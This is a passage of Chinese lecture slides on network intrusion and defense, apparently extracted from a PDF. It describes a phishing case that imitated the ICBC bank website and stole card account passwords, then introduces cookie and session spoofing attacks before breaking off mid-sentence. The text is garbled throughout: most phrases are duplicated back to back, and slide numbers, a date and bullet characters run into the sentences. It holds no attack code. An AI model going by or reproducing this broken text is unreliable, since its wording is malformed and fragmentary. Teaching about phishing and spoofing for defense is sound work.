50、工商银行网站出现在互联网上，诱骗银行卡持有人的帐户和密码，并导致多人的银行存款被盗，直接经济损失达80万元人民币。网络钓鱼乔装银行，众网友自动上钩网络钓鱼乔装银行，众网友自动上钩752022-6-22网络入侵与防范讲义75工商银行网站被仿造又一例工商银行网站被仿造又一例URL露出露出了马脚了马脚7677针对于站点的欺骗攻击技术针对于站点的欺骗攻击技术lcookies欺骗攻击欺骗攻击lsession欺骗攻击欺骗攻击78cookies欺骗原理欺骗原理l什么是什么是cookies? 因特网浏览器的记录标记因特网浏览器的记录标记lcookies的作用的作用? Cookies是一种能够让网站服务器把少量